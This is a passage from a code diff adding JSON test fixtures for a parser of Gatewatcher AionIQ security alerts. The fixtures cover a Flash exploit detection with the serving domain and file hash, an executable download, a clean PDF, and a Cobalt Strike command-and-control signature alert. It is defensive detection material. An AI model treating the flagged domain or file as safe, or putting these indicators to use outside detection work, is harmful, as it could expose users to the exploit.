\"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"chunky.enchantingweddingsandevents.co.uk\",\n    \"version\": \"HTTP/1.1\",\n    \"http_refer\": \"http://chunky.enchantingweddingsandevents.co.uk/topic/03251-esplanade-interoperability-fuchsias-renegotiate-percent-youngster-trounced/\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/x-shockwave-flash\",\n      \"bytes\": 55351\n    }\n  },\n  \"event\": {\n    \"id\": \"7c4e2a77-3481-4201-8247-889fe0718ed8\",\n    \"kind\": \"alert\",\n    \"module\": \"malcore\",\n    \"severity\": 1,\n    \"category\": [\n      \"network\",\n      \"file\"\n    ],\n    \"created\": \"2024-09-11T09:15:23.329615+0000\",\n    \"dataset\": \"alert\"\n  }\n}",
+    "event": {
+      "category": [
+        "file",
+        "network"
+      ],
+      "dataset": "alert",
+      "kind": "alert",
+      "module": "malcore",
+      "severity": 1
+    },
+    "@timestamp": "2024-09-11T09:31:00.111583Z",
+    "destination": {
+      "address": "27.0.0.144",
+      "ip": "27.0.0.144",
+      "port": 47858
+    },
+    "file": {
+      "hash": {
+        "sha256": "6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b"
+      },
+      "name": "/",
+      "size": 55351
+    },
+    "gatewatcher": {
+      "event": {
+        "created": "2024-09-11T09:15:23.329615Z",
+        "id": "7c4e2a77-3481-4201-8247-889fe0718ed8"
+      },
+      "file": {
+        "file_id": 219,
+        "gaps": false,
+        "magic": "Macromedia Flash data (compressed), version 13",
+        "sid": [
+          "1100020"
+        ],
+        "state": "CLOSED",
+        "stored": true,
+        "tx_id": 2
+      },
+      "http": {
+        "hostname": "chunky.enchantingweddingsandevents.co.uk",
+        "http_refer": "http://chunky.enchantingweddingsandevents.co.uk/topic/03251-esplanade-interoperability-fuchsias-renegotiate-percent-youngster-trounced/"
+      },
+      "malcore": {
+        "analyzed_clean": 9,
+        "analyzed_error": 0,
+        "analyzed_infected": 3,
+        "analyzed_other": 4,
+        "analyzed_suspicious": 0,
+        "analyzers_up": 16,
+        "code": 1,
+        "detail_scan_time": 373,
+        "detail_threat_found": "Infected : EXP/Flash.EB.502, SWF/Exploit, Exploit.Flash",
+        "detail_wait_time": 660,
+        "engine_id": "{\"0\": {\"id\": \"a32935b\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"1\": {\"id\": \"acf9bba\", \"scan_result\": \"INFECTED\", \"threat_details\": \"EXP/Flash.EB.502\"}, \"10\": {\"id\": \"mb2b5fe\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"11\": {\"id\": \"n00000e\", \"scan_result\": \"NOT_SCANNED\", \"threat_details\": \"Unavailable (permanently_failed)\"}, \"12\": {\"id\": \"qb9308l\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"13\": {\"id\": \"sde882s\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"14\": {\"id\": \"t3114fn\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"15\": {\"id\": \"we9a17t\", \"scan_result\": \"UNSUPPORTED_FILE_TYPE\", \"threat_details\": \"\"}, \"2\": {\"id\": \"af7872b\", \"scan_result\": \"INFECTED\", \"threat_details\": \"SWF/Exploit\"}, \"3\": {\"id\": \"b557a5r\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"4\": {\"id\": \"c10195e\", \"scan_result\": \"UNSUPPORTED_FILE_TYPE\", \"threat_details\": \"\"}, \"5\": {\"id\": \"c18ab9n\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"6\": {\"id\": \"c81e55c\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}, \"7\": {\"id\": \"e83bf1t\", \"scan_result\": \"NOT_SCANNED\", \"threat_details\": \"\"}, \"8\": {\"id\": \"ib54e9s\", \"scan_result\": \"INFECTED\", \"threat_details\": \"Exploit.Flash\"}, \"9\": {\"id\": \"kfb8487\", \"scan_result\": \"CLEAN\", \"threat_details\": \"\"}}",
+        "engines_last_update_date": "2024-09-03T17:15:00Z",
+        "file_type": "application/x-shockwave-flash",
+        "file_type_description": "Macromedia Flash Player",
+        "magic_details": "Macromedia Flash data (compressed), version 13",
+        "processing_time": 1576,
+        "state": "Infected",
+        "total_found": "3/16"
+      },
+      "network": {
+        "flow_id": 1779492455056060,
+        "timestamp": "2024-09-11T09:15:23.329615Z"
+      },
+      "observer": {
+        "gcap": {
+          "hostname": "gcap-clement-l.gatewatcher.fr",
+          "ingress": {
+            "interface": {
+              "name": "monvirt"
+            }
+          },
+          "version": "2.5.4.0-rc1"
+        },
+        "log_format_version": "1.0.0",
+        "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+      },
+      "version": "1"
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      },
+      "response": {
+        "bytes": 55351,
+        "mime_type": "application/x-shockwave-flash",
+        "status_code": 200
+      },
+      "version": "HTTP/1.1"
+    },
+    "network": {
+      "protocol": "http",
+      "transport": "tcp"
+    },
+    "observer": {
+      "hostname": "gcenter-clelyo-01.gatewatcher.com",
+      "product": "gcenter",
+      "vendor": "gatewatcher",
+      "version": "2.5.3.103"
+    },
+    "related": {
+      "hash": [
+        "6d3a6e2c771ab1a3721235ed3b3c4a2c3013290564272bcb6fbc9a15be79278b"
+      ],
+      "hosts": [
+        "chunky.enchantingweddingsandevents.co.uk",
+        "gcenter-clelyo-01.gatewatcher.com"
+      ],
+      "ip": [
+        "202.129.215.251",
+        "27.0.0.144"
+      ]
+    },
+    "source": {
+      "address": "202.129.215.251",
+      "ip": "202.129.215.251",
+      "port": 80
+    },
+    "url": {
+      "domain": "chunky.enchantingweddingsandevents.co.uk",
+      "path": "/?q=&g=BDvv&y=enL16_6s_&s=t5qV-&e=_b_J--DqR&w=C2pZhaRyfn3uVT_v5Sfgs",
+      "registered_domain": "enchantingweddingsandevents.co.uk",
+      "subdomain": "chunky",
+      "top_level_domain": "co.uk"
+    },
+    "user_agent": {
+      "device": {
+        "name": "Other"
+      },
+      "name": "IE",
+      "original": "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko",
+      "os": {
+        "name": "Windows",
+        "version": "7"
+      },
+      "version": "11.0"
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/metadata.json b/GateWatcher/aioniq_ecs/tests/metadata.json
new file mode 100644
index 000000000..0530043dc
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/metadata.json
@@ -0,0 +1,113 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"mac\": \"00:50:56:91:85:03\",\n    \"port\": 56098,\n    \"ip\": \"10.2.19.131\"\n  },\n  \"metadata\": {\n    \"flowbits\": [\n      \"min.gethttp\",\n      \"exe.no.referer\",\n      \"ET.http.binary\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-12T13:24:51.231Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"community_id\": \"1:X+96B6BxVtmLT4rsbtdZeemyV0M=\",\n    \"timestamp\": \"2024-09-12T13:24:15.978904+0000\",\n    \"transport\": \"tcp\",\n    \"tx_id\": 6,\n    \"flow_id\": 803295979358070\n  },\n  \"destination\": {\n    \"mac\": \"00:09:0f:09:00:12\",\n    \"port\": 80,\n    \"ip\": \"10.2.10.205\"\n  },\n  \"url\": {\n    \"path\": \"/FireInstaller4.exe\"\n  },\n  \"user_agent\": {\n    \"original\": \"nghttp2/1.43.0\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request_headers\": [\n      {\n        \"name\": \":method\",\n        \"value\": \"GET\"\n      },\n      {\n        \"name\": \":path\",\n        \"value\": \"/FireInstaller4.exe\"\n      },\n      {\n        \"name\": \":scheme\",\n        \"value\": \"http\"\n      },\n      {\n        \"name\": \":authority\",\n        \"value\": \"10.2.10.205\"\n      },\n      {\n        \"name\": \"accept\",\n        \"value\": \"*/*\"\n      },\n      {\n        \"name\": \"accept-encoding\",\n        \"value\": \"gzip, deflate\"\n      },\n      {\n        \"name\": \"user-agent\",\n        \"value\": \"nghttp2/1.43.0\"\n      }\n    ],\n    \"http2\": {\n      \"request\": {\n        \"priority\": 15\n      },\n      \"stream_id\": 13,\n      \"response\": {}\n    },\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"response_headers\": [\n      {\n        \"name\": \":status\",\n        \"value\": \"200\"\n      },\n      {\n        \"name\": \"server\",\n        \"value\": \"nginx/1.25.2\"\n      },\n      {\n        \"name\": \"date\",\n        \"value\": \"Mon, 08 Jan 2024 15:27:20 GMT\"\n      },\n      {\n        \"name\": \"content-type\",\n        \"value\": \"text/plain\"\n      },\n      {\n        \"name\": \"content-length\",\n        \"value\": \"319824\"\n      },\n      {\n        \"name\": \"last-modified\",\n        \"value\": \"Mon, 08 Jan 2024 15:21:12 GMT\"\n      },\n      {\n        \"name\": \"etag\",\n        \"value\": \"\\\"659c12e8-4e150\\\"\"\n      },\n      {\n        \"name\": \"accept-ranges\",\n        \"value\": \"bytes\"\n      }\n    ],\n    \"version\": \"2\",\n    \"response\": {\n      \"status\": 200,\n      \"bytes\": 319824\n    }\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"module\": \"sigflow_http\",\n    \"category\": [\n      \"network\"\n    ],\n    \"created\": \"2024-09-12T13:24:15.978904+0000\",\n    \"dataset\": \"network_metadata\",\n    \"id\": \"78681613-57af-4e10-b732-58f5d2e0ae12\"\n  }\n}"
+  },
+  "expected": {
+    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"mac\": \"00:50:56:91:85:03\",\n    \"port\": 56098,\n    \"ip\": \"10.2.19.131\"\n  },\n  \"metadata\": {\n    \"flowbits\": [\n      \"min.gethttp\",\n      \"exe.no.referer\",\n      \"ET.http.binary\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-12T13:24:51.231Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"community_id\": \"1:X+96B6BxVtmLT4rsbtdZeemyV0M=\",\n    \"timestamp\": \"2024-09-12T13:24:15.978904+0000\",\n    \"transport\": \"tcp\",\n    \"tx_id\": 6,\n    \"flow_id\": 803295979358070\n  },\n  \"destination\": {\n    \"mac\": \"00:09:0f:09:00:12\",\n    \"port\": 80,\n    \"ip\": \"10.2.10.205\"\n  },\n  \"url\": {\n    \"path\": \"/FireInstaller4.exe\"\n  },\n  \"user_agent\": {\n    \"original\": \"nghttp2/1.43.0\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request_headers\": [\n      {\n        \"name\": \":method\",\n        \"value\": \"GET\"\n      },\n      {\n        \"name\": \":path\",\n        \"value\": \"/FireInstaller4.exe\"\n      },\n      {\n        \"name\": \":scheme\",\n        \"value\": \"http\"\n      },\n      {\n        \"name\": \":authority\",\n        \"value\": \"10.2.10.205\"\n      },\n      {\n        \"name\": \"accept\",\n        \"value\": \"*/*\"\n      },\n      {\n        \"name\": \"accept-encoding\",\n        \"value\": \"gzip, deflate\"\n      },\n      {\n        \"name\": \"user-agent\",\n        \"value\": \"nghttp2/1.43.0\"\n      }\n    ],\n    \"http2\": {\n      \"request\": {\n        \"priority\": 15\n      },\n      \"stream_id\": 13,\n      \"response\": {}\n    },\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"response_headers\": [\n      {\n        \"name\": \":status\",\n        \"value\": \"200\"\n      },\n      {\n        \"name\": \"server\",\n        \"value\": \"nginx/1.25.2\"\n      },\n      {\n        \"name\": \"date\",\n        \"value\": \"Mon, 08 Jan 2024 15:27:20 GMT\"\n      },\n      {\n        \"name\": \"content-type\",\n        \"value\": \"text/plain\"\n      },\n      {\n        \"name\": \"content-length\",\n        \"value\": \"319824\"\n      },\n      {\n        \"name\": \"last-modified\",\n        \"value\": \"Mon, 08 Jan 2024 15:21:12 GMT\"\n      },\n      {\n        \"name\": \"etag\",\n        \"value\": \"\\\"659c12e8-4e150\\\"\"\n      },\n      {\n        \"name\": \"accept-ranges\",\n        \"value\": \"bytes\"\n      }\n    ],\n    \"version\": \"2\",\n    \"response\": {\n      \"status\": 200,\n      \"bytes\": 319824\n    }\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"module\": \"sigflow_http\",\n    \"category\": [\n      \"network\"\n    ],\n    \"created\": \"2024-09-12T13:24:15.978904+0000\",\n    \"dataset\": \"network_metadata\",\n    \"id\": \"78681613-57af-4e10-b732-58f5d2e0ae12\"\n  }\n}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "network_metadata",
+      "kind": "event",
+      "module": "sigflow_http"
+    },
+    "@timestamp": "2024-09-12T13:24:51.231000Z",
+    "destination": {
+      "address": "10.2.10.205",
+      "ip": "10.2.10.205",
+      "mac": "00:09:0f:09:00:12",
+      "port": 80
+    },
+    "gatewatcher": {
+      "event": {
+        "created": "2024-09-12T13:24:15.978904Z",
+        "id": "78681613-57af-4e10-b732-58f5d2e0ae12"
+      },
+      "http": {
+        "http2": "{\"request\": {\"priority\": 15}, \"response\": {}, \"stream_id\": 13}"
+      },
+      "metadata": {
+        "flowbits": [
+          "ET.http.binary",
+          "exe.no.referer",
+          "min.gethttp"
+        ]
+      },
+      "network": {
+        "flow_id": 803295979358070,
+        "timestamp": "2024-09-12T13:24:15.978904Z",
+        "tx_id": 6
+      },
+      "observer": {
+        "gcap": {
+          "hostname": "gcap-clement-l.gatewatcher.fr",
+          "ingress": {
+            "interface": {
+              "name": "monvirt"
+            }
+          },
+          "version": "2.5.4.0-rc1"
+        },
+        "log_format_version": "1.0.0",
+        "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+      },
+      "version": "1"
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      },
+      "response": {
+        "bytes": 319824,
+        "status_code": 200
+      },
+      "version": "2"
+    },
+    "network": {
+      "community_id": "1:X+96B6BxVtmLT4rsbtdZeemyV0M=",
+      "protocol": "http",
+      "transport": "tcp"
+    },
+    "observer": {
+      "hostname": "gcenter-clelyo-01.gatewatcher.com",
+      "product": "gcenter",
+      "vendor": "gatewatcher",
+      "version": "2.5.3.103"
+    },
+    "related": {
+      "hosts": [
+        "gcenter-clelyo-01.gatewatcher.com"
+      ],
+      "ip": [
+        "10.2.10.205",
+        "10.2.19.131"
+      ]
+    },
+    "source": {
+      "address": "10.2.19.131",
+      "ip": "10.2.19.131",
+      "mac": "00:50:56:91:85:03",
+      "port": 56098
+    },
+    "url": {
+      "path": "/FireInstaller4.exe"
+    },
+    "user_agent": {
+      "device": {
+        "name": "Other"
+      },
+      "name": "Other",
+      "original": "nghttp2/1.43.0",
+      "os": {
+        "name": "Other"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json b/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json
new file mode 100644
index 000000000..d575e8d2a
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json
@@ -0,0 +1,117 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"port\": 80,\n    \"ip\": \"56.53.117.115\"\n  },\n  \"file\": {\n    \"magic\": \"PDF document, version 1.5\",\n    \"sid\": [\n      1100008\n    ],\n    \"hash\": {\n      \"sha256\": \"50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703\"\n    },\n    \"name\": \"/malcore_10KB_clean.pdf\",\n    \"file_id\": 224,\n    \"tx_id\": 0,\n    \"state\": \"CLOSED\",\n    \"gaps\": false,\n    \"size\": 10456,\n    \"stored\": true\n  },\n  \"@timestamp\": \"2024-09-11T13:56:19.010Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"timestamp\": \"2024-09-11T13:55:51.326090+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 1331841998458539\n  },\n  \"destination\": {\n    \"port\": 62832,\n    \"ip\": \"65.100.113.120\"\n  },\n  \"url\": {\n    \"domain\": \"56.53.117.115\",\n    \"path\": \"/malcore_10KB_clean.pdf\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"56.53.117.115\",\n    \"version\": \"HTTP/1.1\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/pdf\",\n      \"bytes\": 10456\n    }\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"module\": \"sigflow_file\",\n    \"category\": [\n      \"network\",\n      \"file\"\n    ],\n    \"created\": \"2024-09-11T13:55:51.326090+0000\",\n    \"dataset\": \"network_metadata\",\n    \"id\": \"d66539e6-825e-4516-8c8c-2778dd6d9358\"\n  }\n}"
+  },
+  "expected": {
+    "message": "{\n  \"observer\": {\n    \"vendor\": \"gatewatcher\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\",\n      \"version\": \"2.5.4.0-rc1\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"port\": 80,\n    \"ip\": \"56.53.117.115\"\n  },\n  \"file\": {\n    \"magic\": \"PDF document, version 1.5\",\n    \"sid\": [\n      1100008\n    ],\n    \"hash\": {\n      \"sha256\": \"50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703\"\n    },\n    \"name\": \"/malcore_10KB_clean.pdf\",\n    \"file_id\": 224,\n    \"tx_id\": 0,\n    \"state\": \"CLOSED\",\n    \"gaps\": false,\n    \"size\": 10456,\n    \"stored\": true\n  },\n  \"@timestamp\": \"2024-09-11T13:56:19.010Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"timestamp\": \"2024-09-11T13:55:51.326090+0000\",\n    \"transport\": \"tcp\",\n    \"flow_id\": 1331841998458539\n  },\n  \"destination\": {\n    \"port\": 62832,\n    \"ip\": \"65.100.113.120\"\n  },\n  \"url\": {\n    \"domain\": \"56.53.117.115\",\n    \"path\": \"/malcore_10KB_clean.pdf\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"56.53.117.115\",\n    \"version\": \"HTTP/1.1\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/pdf\",\n      \"bytes\": 10456\n    }\n  },\n  \"event\": {\n    \"kind\": \"event\",\n    \"module\": \"sigflow_file\",\n    \"category\": [\n      \"network\",\n      \"file\"\n    ],\n    \"created\": \"2024-09-11T13:55:51.326090+0000\",\n    \"dataset\": \"network_metadata\",\n    \"id\": \"d66539e6-825e-4516-8c8c-2778dd6d9358\"\n  }\n}",
+    "event": {
+      "category": [
+        "file",
+        "network"
+      ],
+      "dataset": "network_metadata",
+      "kind": "event",
+      "module": "sigflow_file"
+    },
+    "@timestamp": "2024-09-11T13:56:19.010000Z",
+    "destination": {
+      "address": "65.100.113.120",
+      "ip": "65.100.113.120",
+      "port": 62832
+    },
+    "file": {
+      "hash": {
+        "sha256": "50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703"
+      },
+      "name": "/malcore_10KB_clean.pdf",
+      "size": 10456
+    },
+    "gatewatcher": {
+      "event": {
+        "created": "2024-09-11T13:55:51.326090Z",
+        "id": "d66539e6-825e-4516-8c8c-2778dd6d9358"
+      },
+      "file": {
+        "file_id": 224,
+        "gaps": false,
+        "magic": "PDF document, version 1.5",
+        "sid": [
+          "1100008"
+        ],
+        "state": "CLOSED",
+        "stored": true,
+        "tx_id": 0
+      },
+      "http": {
+        "hostname": "56.53.117.115"
+      },
+      "network": {
+        "flow_id": 1331841998458539,
+        "timestamp": "2024-09-11T13:55:51.326090Z"
+      },
+      "observer": {
+        "gcap": {
+          "hostname": "gcap-clement-l.gatewatcher.fr",
+          "ingress": {
+            "interface": {
+              "name": "monvirt"
+            }
+          },
+          "version": "2.5.4.0-rc1"
+        },
+        "log_format_version": "1.0.0",
+        "uuid": "78f4fed1-c9ad-52b9-b509-6b87767f501f"
+      },
+      "version": "1"
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      },
+      "response": {
+        "bytes": 10456,
+        "mime_type": "application/pdf",
+        "status_code": 200
+      },
+      "version": "HTTP/1.1"
+    },
+    "network": {
+      "protocol": "http",
+      "transport": "tcp"
+    },
+    "observer": {
+      "hostname": "gcenter-clelyo-01.gatewatcher.com",
+      "product": "gcenter",
+      "vendor": "gatewatcher",
+      "version": "2.5.3.103"
+    },
+    "related": {
+      "hash": [
+        "50c561f1e32cb1990a3050015088713e657f0081ba774dda2f9fcef828dcf703"
+      ],
+      "hosts": [
+        "56.53.117.115",
+        "gcenter-clelyo-01.gatewatcher.com"
+      ],
+      "ip": [
+        "56.53.117.115",
+        "65.100.113.120"
+      ]
+    },
+    "source": {
+      "address": "56.53.117.115",
+      "ip": "56.53.117.115",
+      "port": 80
+    },
+    "url": {
+      "domain": "56.53.117.115",
+      "path": "/malcore_10KB_clean.pdf"
+    }
+  }
+}
\ No newline at end of file
diff --git a/GateWatcher/aioniq_ecs/tests/nba.json b/GateWatcher/aioniq_ecs/tests/nba.json
new file mode 100644
index 000000000..c4540e394
--- /dev/null
+++ b/GateWatcher/aioniq_ecs/tests/nba.json
@@ -0,0 +1,139 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ V103",
+        "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
+      }
+    },
+    "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n      \"version\": \"2.5.3.107\",\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"mon0\"\n        }\n      }\n    },\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"alert\",\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"module\": \"network_behavior_analytics\",\n    \"created\": \"2022-09-01T16:06:15.605Z\",\n    \"id\": \"730a47f1-f7b1-4faa-9d61-8a41d7b138ed\",\n    \"severity\": 2\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"network\": {\n    \"transport\": \"tcp\",\n    \"protocol\": \"http\",\n    \"flow_id\": 2071994639527866,\n    \"community_id\": \"1:Q22WBDRnlyCXH/Y/pcypXCr+nJc=\",\n    \"timestamp\": \"2022-09-01T16:06:15.605Z\",\n    \"tx_id\": 0\n  },\n  \"source\": {\n    \"ip\": \"10.2.6.250\",\n    \"port\": 50886,\n    \"mac\": \"00:50:56:91:73:14\"\n  },\n  \"destination\": {\n    \"ip\": \"13.107.4.52\",\n    \"port\": 80,\n    \"mac\": \"00:08:e3:ff:fc:28\"\n  },\n  \"nba\": {\n    \"packet\": \"AAjj//woAFBWkXMUCABFAAAo6pNAAEAGLaIKAgb6DWsENMbGAFBecku30OsVlVAQAfUzhAAAAAAAAAAA\",\n    \"payload\": \"R0VUIC9jb25uZWN0dGVzdC50eHQgSFRUUC8xLjENClByYWdtYTogbm8tY2FjaGUNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBOQ1NJDQpIb3N0OiB3d3cubXNmdGNvbm5lY3R0ZXN0LmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K\",\n    \"payload_printable\": \"GET /connecttest.txt HTTP/1.1\\r\\nPragma: no-cache\\r\\nUser-Agent: Microsoft NCSI\\r\\nHost: www.msftconnecttest.com\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n    \"signature_id\": 2031071,\n    \"gid\": 1,\n    \"category\": \"Network Behavior Analytics\",\n    \"action\": \"allowed\",\n    \"signature\": \"NBA C&C tracker : cobalt strike tcp initialization\",\n    \"metadata\": {\n      \"performance_impact\": [\n        \"High\"\n      ],\n      \"signature_severity\": [\n        \"CRITICAL\"\n      ]\n    },\n    \"rev\": 1,\n    \"stream\": 1\n  },\n  \"http\": {\n    \"url\": \"/connecttest.txt\",\n    \"http_user_agent\": \"Microsoft NCSI\",\n    \"version\": \"HTTP/1.1\",\n    \"hostname\": \"www.msftconnecttest.com\",\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"response\": {\n      \"bytes\": 22,\n      \"status_code\": 200,\n      \"mime_type\": \"text/plain\"\n    }\n  },\n  \"url\": {\n    \"domain\": \"www.msftconnecttest.com\",\n    \"path\": \"/connecttest.txt\"\n  },\n  \"user_agent\": {\n    \"original\": \"Microsoft NCSI\"\n  },\n  \"packet_info\": {\n    \"linktype\": 1\n  },\n  \"flow\": {\n    \"bytes_toclient\": 700,\n    \"pkts_toclient\": 3,\n    \"bytes_toserver\": 407,\n    \"pkts_toserver\": 4,\n    \"start\": \"2022-09-01T16:06:15.602042+0000\"\n  },\n  \"@version\": \"1\",\n  \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}"
+  },
+  "expected": {
+    "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n      \"version\": \"2.5.3.107\",\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"mon0\"\n        }\n      }\n    },\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"alert\",\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"module\": \"network_behavior_analytics\",\n    \"created\": \"2022-09-01T16:06:15.605Z\",\n    \"id\": \"730a47f1-f7b1-4faa-9d61-8a41d7b138ed\",\n    \"severity\": 2\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"network\": {\n    \"transport\": \"tcp\",\n    \"protocol\": \"http\",\n    \"flow_id\": 2071994639527866,\n    \"community_id\": \"1:Q22WBDRnlyCXH/Y/pcypXCr+nJc=\",\n    \"timestamp\": \"2022-09-01T16:06:15.605Z\",\n    \"tx_id\": 0\n  },\n  \"source\": {\n    \"ip\": \"10.2.6.250\",\n    \"port\": 50886,\n    \"mac\": \"00:50:56:91:73:14\"\n  },\n  \"destination\": {\n    \"ip\": \"13.107.4.52\",\n    \"port\": 80,\n    \"mac\": \"00:08:e3:ff:fc:28\"\n  },\n  \"nba\": {\n    \"packet\": \"AAjj//woAFBWkXMUCABFAAAo6pNAAEAGLaIKAgb6DWsENMbGAFBecku30OsVlVAQAfUzhAAAAAAAAAAA\",\n    \"payload\": 